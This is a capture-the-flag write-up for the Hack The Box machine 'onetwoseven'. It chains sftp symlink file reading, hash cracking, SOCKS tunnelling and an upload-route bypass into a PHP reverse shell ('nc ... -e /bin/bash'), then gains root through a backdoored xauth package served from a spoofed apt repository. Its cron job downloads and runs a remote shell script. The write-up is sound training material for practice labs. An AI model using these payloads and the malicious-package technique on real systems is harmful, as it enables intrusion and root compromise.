onetwoseven is a really interesting linux machine which requires some sftp enumeration and making a simple port forwarding in order to get user. But to get root, things get harder and we'll need to make some source code review and create and serve our own malicious apt repository.

User Privilege Escalation


First, run nmap to see we only have port 22 and 80 open.

root@kali:~/htb# nmap -sC -sV
Starting Nmap 7.70 ( ) at 2019-06-02 10:37 EDT
Nmap scan report for
Host is up (0.21s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 48:6c:93:34:16:58:05:eb:9a:e5:5b:96:b6:d5:14:aa (RSA)
|   256 32:b7:f3:e2:6d:ac:94:3e:6f:11:d8:05:b9:69:58:45 (ECDSA)
|_  256 35:52:04:dc:32:69:1a:b7:52:76:06:e3:6c:17:1e:ad (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Page moved.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

On the Apache server we have the following website.

If we click on the sign up button we get some credentials to access via sftp to the machine.

Let's add those domains to /etc/hosts to create the relations on our machine.	onetwoseven.htb www.onetwoseven.htb

Then, if we visit our personal home page as the sign up page said (http://www.onetwoseven.htb/~ots-5MGVkZWI) we get an empty page.

Also, connecting via ssh with those credentials warns us that this service only allows sftp.

root@kali:~/htb/onetwoseven# ssh ots-5MGVkZWI@
ots-5MGVkZWI@'s password: 
This service allows sftp connections only.
Connection to closed.

We just have to use the same credentials and use sftp to login.

root@kali:~/htb/onetwoseven# sftp ots-5MGVkZWI@
ots-5MGVkZWI@'s password: 4d90edeb
Connected to ots-5MGVkZWI@

Here we can upload files, which will be available in our home page.

sftp> put test.php 
Uploading test.php to /public_html/test.php
test.php                                             100%   21     0.1KB/s   00:00    

Unfortunately, if we try to access to any php file we'll get a forbidden error.

On the website information there's an explanation about why we can't access those php files.

In this sftp session we are limited only to our home folder, so looking for help about what we can do with this service we come across the following commands.

sftp> help
Available commands:
bye                                Quit sftp
cd path                            Change remote directory to 'path'
chgrp grp path                     Change group of file 'path' to 'grp'
chmod mode path                    Change permissions of file 'path' to 'mode'
chown own path                     Change owner of file 'path' to 'own'
df [-hi] [path]                    Display statistics for current directory or
                                   filesystem containing 'path'
exit                               Quit sftp
get [-afPpRr] remote [local]       Download file
reget [-fPpRr] remote [local]      Resume download file
reput [-fPpRr] [local] remote      Resume upload file
help                               Display this help text
lcd path                           Change local directory to 'path'
lls [ls-options [path]]            Display local directory listing
lmkdir path                        Create local directory
ln [-s] oldpath newpath            Link remote file (-s for symlink)
lpwd                               Print local working directory
ls [-1afhlnrSt] [path]             Display remote directory listing
lumask umask                       Set local umask to 'umask'
mkdir path                         Create remote directory
progress                           Toggle display of progress meter
put [-afPpRr] local [remote]       Upload file
pwd                                Display remote working directory
quit                               Quit sftp
rename oldpath newpath             Rename remote file
rm path                            Delete remote file
rmdir path                         Remove remote directory
symlink oldpath newpath            Symlink remote file
version                            Show SFTP version
!command                           Execute 'command' in local shell
!                                  Escape to local shell
?                                  Synonym for help

The one which is interesting is symlink, which allows us to create links referencing other files and therefore access to files outside our folder.

Here we're creating a file link in our folder that references /etc/passwd.

sftp> symlink /etc/passwd link

Then if we access to the website and visit the file link (http://onetwoseven.htb/~ots-5MGVkZWI/link) we get the contents of /etc/passwd.


Now instead of referencing a single file, we're going to make a symlink to /.

sftp> symlink / caca

And visiting http://onetwoseven.htb/~ots-5MGVkZWI/caca/ gives us a directory listing of the whole filesystem.

Enumerating a bit we can find the swap file /var/www/html-admin/.login.php.swp. We can view some of its contents using strings.

root@kali:~/htb/onetwoseven# strings login.php.swp 
b0VIM 8.0
            <h4 class = "form-signin-heading"><font size="-1" color="red"></font></h4>
         <form action="/login.php" method="post">
	      if ($_POST['username'] == 'ots-admin' && hash('sha256',$_POST['password']) == '11c5a42c9d74d5442ef3cc835bda1b3e7cc7f494e704a10d0de426b2fbe5cbd8') {
            if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {

There we have a username (ots-admin) and a sha256 hashed password, let's crack it with john.

root@kali:~/htb/onetwoseven# john ots.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 128/128 AVX 4x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Homesweethome1   (?)
1g 0:00:00:01 DONE (2019-06-04 16:00) 0.6993g/s 7768Kp/s 7768Kc/s 7768KC/s IloveBrandiLynn..Hannah//*12
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed

On the source code of the main website we have the following commented link, but we can't access directly.

<!-- Only enable link if access from trusted networks admin/20190212 -->
        <!-- Added localhost admin/20190214 -->
		  <li class="nav-item"><a id="adminlink" class="nav-link disabled" href="http://onetwoseven.htb:60080/">Admin</a></li>

I'm making a dynamic port forwarding which will allow to make any TCP connection through onetwoseven if we use proxychains, then we should be able to connect to port 60080.

man ssh:
-f To request ssh to go background.
-N Do not execute a remote command.
-D Dynamic port forwarding.

root@kali:~/htb/onetwoseven# ssh -fND 1337 ots-5MGVkZWI@
ots-5MGVkZWI@'s password: 4d90edeb

Next, modify proxychains configuration (/etc/proxychains.conf) in our local machine and add the following line to use the specified port to connect with SOCKS5.

socks5 1337

We can confirm everything works as expected making a curl request through proxychains.

root@kali:~/htb/onetwoseven# proxychains curl
ProxyChains-3.1 (
<!doctype html>
<html lang="en">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="Mark Otto, Jacob Thornton, and Bootstrap contributors">
    <meta name="generator" content="Jekyll v3.8.5">

Now, to access to the website through the browser, we're going to configure Burp on User options to use our port forward as a socks proxy and send our browser requests through Burp.

Now we're able to connect to the admin panel with firefox.

Use the obtained credentials to access (ots-admin / Homesweethome1).

Clicking on OTS Default User we get the credentials for the default user.

If we use his credentials through sftp we can access to his folder where the user flag is stored.

root@kali:~/htb/onetwoseven# sftp ots-yODc2NGQ@
ots-yODc2NGQ@'s password: f528764d
Connected to ots-yODc2NGQ@
sftp> ls
public_html  user.txt     
sftp> get user.txt
Fetching /user.txt to user.txt
/user.txt                                 100%   33     0.3KB/s   00:00
root@kali:~/htb/onetwoseven# cat user.txt

Privilege Escalation

Clicking on OTS Addon Manager gives us the following information.

A POST request to /addon-upload.php results in a 404 error what should mean the feature is disabled.

If we inspect the source code we can see the file upload occurs when the uri matches with the regex /\/addon-upload.php/.

    case preg_match('/\/addon-upload.php/',$_SERVER['REQUEST_URI']):
            $errors= array();
            $file_name = basename($_FILES['addon']['name']);
            $file_size =$_FILES['addon']['size'];
            $file_tmp =$_FILES['addon']['tmp_name'];

So we can trick the application and use the path /menu.php?addon=addons/ots-man-addon.php&a=/addon-upload.php to match the regex but not calling directly /addon-upload.php because it's disabled. Then upload our php addon which has to follow the structure of the others.

POST /addon-download.php?addon=addons/ots-man-addon.php&a=/addon-upload.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------16077088781772876987425657822
Content-Length: 296
Cookie: hblid=sybgLKxjVma91Cr93m39N0T6F0W0W2A0; olfsk=olfsk1877586908028661; PHPSESSID=jmin5rcmopq0i6kcjken5kcks1
Connection: close
Upgrade-Insecure-Requests: 1

Content-Disposition: form-data; name="addon"; filename="ots-caca.php";
Content-Type: application/x-php

# OneTwoSeven Admin Plugin
# OTS caca
system('nc 6969 -e /bin/bash');


Now clicking on our addon (/menu.php?addon=addons/ots-caca.php) makes a reverse shell to our machine.

root@kali:~/htb/onetwoseven# nc -nlvp 6969
listening on [any] 6969 ...
connect to [] from (UNKNOWN) [] 48586

I automated the process of creating the addon and executing it with the following python script.

import requests
import netifaces

proxies = {'http': 'socks5://'}

base_url = ''
r = requests.get(base_url, proxies = proxies)
cookie = r.headers['Set-Cookie']

url = base_url + 'login.php'
data = 'username=ots-admin&password=Homesweethome1&login='
headers = {'Cookie': cookie, 'Content-Type': 'application/x-www-form-urlencoded'}
r =, data=data, headers=headers, proxies=proxies)

my_ip = netifaces.ifaddresses('tun0')[netifaces.AF_INET][0]['addr']
file = {'addon': ('ots-caca.php', """""")}
headers = {'Cookie': cookie}
url = base_url + 'addon-download.php?addon=addons/ots-man-addon.php&a=/addon-upload.php'
r =, files=file, headers=headers, proxies=proxies) 

url = base_url + 'menu.php?addon=addons/ots-caca.php'
headers = {'Cookie': cookie}
r = requests.get(url, headers=headers, proxies=proxies, timeout=3)

And also the whole process to obtain a shell with this bash script.

ip=$(/sbin/ip -o -4 addr list tun0 | awk '{print $4}' | cut -d/ -f1)
user=$(php -r "echo 'ots-' . substr(str_replace('=','',base64_encode(substr(md5('$ip'),0,8))),3);")
pass=$(php -r "echo substr(md5('$ip'),0,8);")
echo -e "${GREEN}[+]${NC} Hello $user / $pass"
echo -e "${GREEN}[+]${NC} Port forwarding"
sshpass -p$pass ssh -fND 1337 $user@
echo -e "${GREEN}[+]${NC} Doing request things"
python 2>/dev/null &
echo -e "${GREEN}[+]${NC} Gimme shell"
nc -nlvp 6969
root@kali:~/htb/onetwoseven# ./ 
[+] Hello ots-iMDE3OTQ / dfb01794
[+] Port forwarding
[+] Doing request things
[+] Gimme shell
listening on [any] 6969 ...
connect to [] from (UNKNOWN) [] 51436

Upgrade the shell.

python -c 'import pty;pty.spawn("/bin/bash")'

We can see our user www-admin can run apt-get update and upgrade as root.

www-admin-data@onetwoseven:/home$ sudo -l
sudo -l
Matching Defaults entries for www-admin-data on onetwoseven:
    env_reset, env_keep+="ftp_proxy http_proxy https_proxy no_proxy",

User www-admin-data may run the following commands on onetwoseven:
    (ALL : ALL) NOPASSWD: /usr/bin/apt-get update, /usr/bin/apt-get upgrade

On the apt sources we can see there's a repository not used.

www-admin-data@onetwoseven:/etc/apt/sources.list.d$ cat onetwoseven.list 
# OneTwoSeven special packages - not yet in use
deb http://packages.onetwoseven.htb/devuan ascii main

What we're going to do is create our own repository in our machine with a malicious package and impersonate packages.onetwoseven.htb to elevate privileges.

First, we need to send the traffic to our machine setting the http_proxy environment variable.

www-admin-data@onetwoseven:/$ export http_proxy=

Then, open Burp and configure it to listen on our htb IP or Next, if we run sudo /usr/bin/apt-get update we'll start to see traffic on the proxy history.

Set the following relation in our /etc/hosts to make those requests be processed by us.   packages.onetwoseven.htb

If we start a SimpleHTTPServer and run update again we'll see how it starts asking for files to us.

root@kali:~/htb/onetwoseven/apt# python -m SimpleHTTPServer 80
Serving HTTP on port 80 ... - - [14/Jul/2019 15:51:51] code 404, message File not found - - [14/Jul/2019 15:51:51] "GET /devuan/dists/ascii/InRelease HTTP/1.1" 404 - - - [14/Jul/2019 15:51:51] code 404, message File not found - - [14/Jul/2019 15:51:51] "GET /devuan/dists/ascii/Release HTTP/1.1" 404 - - - [14/Jul/2019 15:51:51] code 404, message File not found - - [14/Jul/2019 15:51:51] "GET /devuan/dists/ascii/main/binary-amd64/Packages.xz HTTP/1.1" 404 - - - [14/Jul/2019 15:51:52] code 404, message File not found - - [14/Jul/2019 15:51:52] "GET /devuan/dists/ascii/main/binary-all/Packages.xz HTTP/1.1" 404 - - - [14/Jul/2019 15:51:52] code 404, message File not found - - [14/Jul/2019 15:51:52] "GET /devuan/dists/ascii/main/i18n/Translation-en.xz HTTP/1.1" 404 - - - [14/Jul/2019 15:51:52] code 404, message File not found - - [14/Jul/2019 15:51:52] "GET /devuan/dists/ascii/main/binary-amd64/Packages.bz2 HTTP/1.1" 404 - - - [14/Jul/2019 15:51:53] code 404, message File not found - - [14/Jul/2019 15:51:53] "GET /devuan/dists/ascii/main/binary-all/Packages.bz2 HTTP/1.1" 404 - - - [14/Jul/2019 15:51:53] code 404, message File not found - - [14/Jul/2019 15:51:53] "GET /devuan/dists/ascii/main/i18n/Translation-en.bz2 HTTP/1.1" 404 - - - [14/Jul/2019 15:51:54] code 404, message File not found - - [14/Jul/2019 15:51:54] "GET /devuan/dists/ascii/main/binary-amd64/Packages.lzma HTTP/1.1" 404 - - - [14/Jul/2019 15:51:54] code 404, message File not found - - [14/Jul/2019 15:51:54] "GET /devuan/dists/ascii/main/binary-all/Packages.lzma HTTP/1.1" 404 - - - [14/Jul/2019 15:51:55] code 404, message File not found - - [14/Jul/2019 15:51:55] "GET /devuan/dists/ascii/main/i18n/Translation-en.lzma HTTP/1.1" 404 - - - [14/Jul/2019 15:51:55] code 404, message File not found - - [14/Jul/2019 15:51:55] "GET /devuan/dists/ascii/main/binary-amd64/Packages.gz HTTP/1.1" 404 - - - [14/Jul/2019 15:51:56] code 404, message File not found - - [14/Jul/2019 15:51:56] "GET /devuan/dists/ascii/main/binary-all/Packages.gz HTTP/1.1" 404 - - - [14/Jul/2019 15:51:56] code 404, message File not found - - [14/Jul/2019 15:51:56] "GET /devuan/dists/ascii/main/i18n/Translation-en.gz HTTP/1.1" 404 - - - [14/Jul/2019 15:51:57] code 404, message File not found - - [14/Jul/2019 15:51:57] "GET /devuan/dists/ascii/main/binary-amd64/Packages.lz4 HTTP/1.1" 404 - - - [14/Jul/2019 15:51:57] code 404, message File not found - - [14/Jul/2019 15:51:57] "GET /devuan/dists/ascii/main/binary-all/Packages.lz4 HTTP/1.1" 404 - - - [14/Jul/2019 15:51:58] code 404, message File not found - - [14/Jul/2019 15:51:58] "GET /devuan/dists/ascii/main/i18n/Translation-en.lz4 HTTP/1.1" 404 - - - [14/Jul/2019 15:51:59] code 404, message File not found - - [14/Jul/2019 15:51:59] "GET /devuan/dists/ascii/main/binary-amd64/Packages HTTP/1.1" 404 - - - [14/Jul/2019 15:51:59] code 404, message File not found - - [14/Jul/2019 15:51:59] "GET /devuan/dists/ascii/main/binary-all/Packages HTTP/1.1" 404 - - - [14/Jul/2019 15:52:00] code 404, message File not found - - [14/Jul/2019 15:52:00] "GET /devuan/dists/ascii/main/i18n/Translation-en HTTP/1.1" 404 -

To create the malicious package I followed this guide and I chose to impersonate xauth.

www-admin-data@onetwoseven:/$ dpkg -l | grep xauth
ii  xauth                                  1:1.0.9-1+b2                       amd64        X authentication utility

Download it from the official repository and extract its contents.

root@kali:~/htb/onetwoseven# dpkg-deb -R xauth_1.0.9-1+b2_amd64.deb modified_xauth

We have to modify DEBIAN/control file and increment the version number, from 1:1.0.9-1+b2 to 1:1.0.9-1+b3 in my example.

root@kali:~/htb/onetwoseven# cat modified_xauth/DEBIAN/control 
Package: xauth
Source: xauth (1:1.0.9-1)
Version: 1:1.0.9-1+b2
Architecture: amd64
Maintainer: Debian X Strike Force <>
Installed-Size: 82
Depends: libc6 (>= 2.14), libx11-6, libxau6, libxext6, libxmuu1
Section: x11
Priority: optional
Description: X authentication utility
 xauth is a small utility to read and manipulate Xauthority files, which
 are used by servers and clients alike to control authentication and access
 to X sessions.

Create the script which we want to be executed. I made it to simply download a file from my machine and execute it.

root@kali:~/htb/onetwoseven/modified_xauth# cat usr/bin/my_script 
rm /tmp/caca
wget -O /tmp/caca
chmod 700 /tmp/caca

Assign execution permissions.

root@kali:~/htb/onetwoseven/modified_xauth# chmod +x usr/bin/my_script

Create or modify DEBIAN/postinst file which will be executed after the installation and in my case I added a cron job to run my_script every 5 minutes.

root@kali:~/htb/onetwoseven/modified_xauth# cat DEBIAN/postinst 

crontab -l | { cat; echo "*/5 * * * * /usr/bin/my_script "; } | crontab -

exit 0

Assign the correct permissions.

root@kali:~/htb/onetwoseven/modified_xauth# chmod 0775 DEBIAN/postinst

Build the package again.

root@kali:~/htb/onetwoseven# dpkg-deb -b modified_xauth xauth_1.0.9-1+b3_amd64.deb
dpkg-deb: building package 'xauth' in 'xauth_1.0.9-1+b3_amd64.deb'.

Get the sha256 and md5 hashes and the size of the file.

root@kali:~/htb/onetwoseven# sha256sum xauth_1.0.9-1+b3_amd64.deb
b94ecc31a45584c6be9e6b0c8ab5681f63968da9aa809aa278b16cfd7fb001ea  xauth_1.0.9-1+b3_amd64.deb
root@kali:~/htb/onetwoseven# md5sum xauth_1.0.9-1+b3_amd64.deb 
6565442fd17512384d6374049256500a  xauth_1.0.9-1+b3_amd64.deb
root@kali:~/htb/onetwoseven# ls -la xauth_1.0.9-1+b3_amd64.deb 
-rw-r--r-- 1 root root 39852 Aug  5 10:45 xauth_1.0.9-1+b3_amd64.deb

Create the following structure to build the repository.

root@kali:~/htb/onetwoseven/apt# tree
└── devuan
    └── dists
        └── ascii
            └── main
                └── binary-amd64

Using grep on onetwoseven retrieve the package information.

www-admin-data@onetwoseven:/$ grep -h -B 15 -A 15 -R "xauth_1.0.9-1+b2" /var/lib/apt/lists/ 2>/dev/null
SHA256: d20deac4ec93b27ccaaba5417005db196beb6cefa52736c75aa7f2140d18660b

Package: xauth
Version: 1:1.0.9-1+b2
Installed-Size: 82
Maintainer: Debian X Strike Force <>
Architecture: amd64
Depends: libc6 (>= 2.14), libx11-6, libxau6, libxext6, libxmuu1
Description: X authentication utility
Description-md5: 20c8545ce7ba7273dbeefb5186103e04
Source: xauth (1:1.0.9-1)
Tag: implemented-in::c, interface::commandline, role::program,
 scope::utility, security::authentication
Section: x11
Priority: optional
Filename: pool/DEBIAN/main/x/xauth/xauth_1.0.9-1+b2_amd64.deb
Size: 39556
MD5sum: f03ab9839c9030fa806c402256ec9346
SHA256: 48f7bb31fc3bae82a9859d44e299675f2a8448354423ac70477405071d7ff04d

Package: xautolock
Version: 1:2.2-5.1+b1
Installed-Size: 67
Maintainer: Wei Liu <>
Architecture: amd64
Depends: libc6 (>= 2.7), libx11-6, libxext6, libxss1
Recommends: xtrlock | xscreensaver | i3lock | suckless-tools
Description: Program launcher for idle X sessions
Description-md5: 2589584ae9ec776d5d2ca89d7ad0fb5f
Source: xautolock (1:2.2-5.1)
Tag: hardware::input, interface::graphical, interface::x11, role::program,

Copy and modify that package information with the new hashes, version and size.

root@kali:~/htb/onetwoseven/apt# cat devuan/dists/ascii/main/binary-amd64/Packages
Package: xauth
Version: 1:1.0.9-1+b3
Installed-Size: 82
Maintainer: Debian X Strike Force <>
Architecture: amd64
Depends: libc6 (>= 2.14), libx11-6, libxau6, libxext6, libxmuu1
Description: X authentication utility
Description-md5: 20c8545ce7ba7273dbeefb5186103e04
Source: xauth (1:1.0.9-1)
Tag: implemented-in::c, interface::commandline, role::program,
 scope::utility, security::authentication
Section: x11
Priority: optional
Filename: pool/DEBIAN/main/x/xauth/xauth_1.0.9-1+b3_amd64.deb
Size: 39852
MD5sum: 6565442fd17512384d6374049256500a
SHA256: b94ecc31a45584c6be9e6b0c8ab5681f63968da9aa809aa278b16cfd7fb001ea

Compress the file.

root@kali:~/htb/onetwoseven/apt/devuan/dists/ascii/main/binary-amd64# gzip Packages -c > Packages.gz

Get the hashes and size of both files.

root@kali:~/htb/onetwoseven/apt/devuan/dists/ascii/main/binary-amd64# md5sum *; sha256sum *; ls -l;
5b0d1a88d9ba9771108707245e7f8e8d  Packages
7e53032c0961d025abafe71ee38fa42f  Packages.gz
8f3f14d47c00ea94079d441ad4d1d5aa0dc5625c65574a0159c3d33bb7e439e1  Packages
8571fcde21f86e943211624fa1109371225b77bd4e1ac252ae5102fba2071061  Packages.gz
total 8
-rw-r--r-- 1 root root 641 Aug  5 11:09 Packages
-rw-r--r-- 1 root root 460 Aug  5 11:10 Packages.gz

Create the Release file with the information about the Packages files.

root@kali:~/htb/onetwoseven/apt/devuan/dists/ascii# cat Release
Origin: Devuan
Label: ascii
Suite: ascii
Version: 2.0.0
Codename: ascii
Date: Mon, 05 Aug 2019 10:20:31 UTC
Architectures: amd64
Components: main
 5b0d1a88d9ba9771108707245e7f8e8d 705 main/binary-amd64/Packages
 7e53032c0961d025abafe71ee38fa42f  517 main/binary-amd64/Packages.gz
 8f3f14d47c00ea94079d441ad4d1d5aa0dc5625c65574a0159c3d33bb7e439e1 641 main/binary-amd64/Packages
 8571fcde21f86e943211624fa1109371225b77bd4e1ac252ae5102fba2071061  460 main/binary-amd64/Packages.gz

We'll need to sign the Release file in order to make it work, so generate a gpg key if you don't have one already.

root@kali:~/htb/onetwoseven# gpg --gen-key

Sign Release to generate Release.gpg.

root@kali:~/htb/onetwoseven/apt/devuan/dists/ascii# gpg -abs -o Release.gpg Release

Move the malicious payload to the correct location and, finally we get the following structure.

root@kali:~/htb/onetwoseven/apt# tree
└── devuan
    ├── dists
    │   └── ascii
    │       ├── main
    │       │   └── binary-amd64
    │       │       ├── Packages
    │       │       └── Packages.gz
    │       ├── Release
    │       └── Release.gpg
    └── pool
        └── DEBIAN
            └── main
                └── x
                    └── xauth
                        └── xauth_1.0.9-1+b3_amd64.deb

Run sudo apt-get update in onetwoseven.

www-admin-data@onetwoseven:/$ sudo apt-get update
Ign:1 http://packages.onetwoseven.htb/devuan ascii InRelease
Get:3 http://packages.onetwoseven.htb/devuan ascii Release [494 B]
Get:5 http://packages.onetwoseven.htb/devuan ascii Release.gpg [659 B]         
Ign:5 http://packages.onetwoseven.htb/devuan ascii Release.gpg                 
Get:7 http://packages.onetwoseven.htb/devuan ascii/main amd64 Packages [460 B] 
Get:2 ascii InRelease [25.6 kB]

We should see how it retrieves the correct files from our repository.

root@kali:~/htb/onetwoseven/apt# python -m SimpleHTTPServer 80
Serving HTTP on port 80 ... - - [05/Aug/2019 14:16:57] code 404, message File not found - - [05/Aug/2019 14:16:57] "GET /devuan/dists/ascii/InRelease HTTP/1.1" 404 - - - [05/Aug/2019 14:16:57] "GET /devuan/dists/ascii/Release HTTP/1.1" 200 - - - [05/Aug/2019 14:16:58] "GET /devuan/dists/ascii/Release.gpg HTTP/1.1" 200 - - - [05/Aug/2019 14:16:58] "GET /devuan/dists/ascii/main/binary-amd64/Packages.gz HTTP/1.1" 200 -

Then sudo apt-get upgrade and indicate that we do want to install xauth even it cannot be authenticated.

www-admin-data@onetwoseven:/$ sudo apt-get upgrade
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
  apache2 apache2-bin apache2-data apache2-utils bind9-host dbus libbind9-140
  libdbus-1-3 libdns-export162 libdns162 libexpat1 libisc-export160 libisc160
  libisccc140 libisccfg140 liblwres141 libpng16-16 libssh2-1 libssl1.0.2
  libssl1.1 libsystemd0 openssl vim vim-common vim-runtime vim-tiny wget xauth
29 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 18.2 MB of archives.
After this operation, 51.2 kB of additional disk space will be used.
Do you want to continue? [Y/n] 
WARNING: The following packages cannot be authenticated!
Install these packages without verification? [y/N] y
Get:1 http://packages.onetwoseven.htb/devuan ascii/main amd64 xauth amd64 1:1.0.9-1+b3 [39.9 kB]

We should see how it downloaded our malicious package. - - [05/Aug/2019 14:17:39] "GET /devuan/pool/DEBIAN/main/x/xauth/xauth_1.0.9-1%2bb3_amd64.deb HTTP/1.1" 200 -

After the installation has finished, our script should be available in /usr/bin and ready to be executed by the cron job.

www-admin-data@onetwoseven:/tmp$ cat /usr/bin/my_script 
rm /tmp/caca
wget -O /tmp/caca
chmod 700 /tmp/caca

Create the file which will be downloaded and executed, a simple reverse shell for example.

root@kali:~/htb/onetwoseven# cat caca 
nc 6767 -e /bin/bash

When 5 minutes have passed it should be retrieved.

root@kali:~/htb/onetwoseven# python -m SimpleHTTPServer 80
Serving HTTP on port 80 ... - - [05/Aug/2019 14:29:54] "GET /caca HTTP/1.1" 200 -

And if we were listening on the specified port, we should get a shell as root.

root@kali:~/htb/onetwoseven# nc -nlvp 6767
listening on [any] 6767 ...
connect to [] from (UNKNOWN) [] 49388
cat /root/root.txt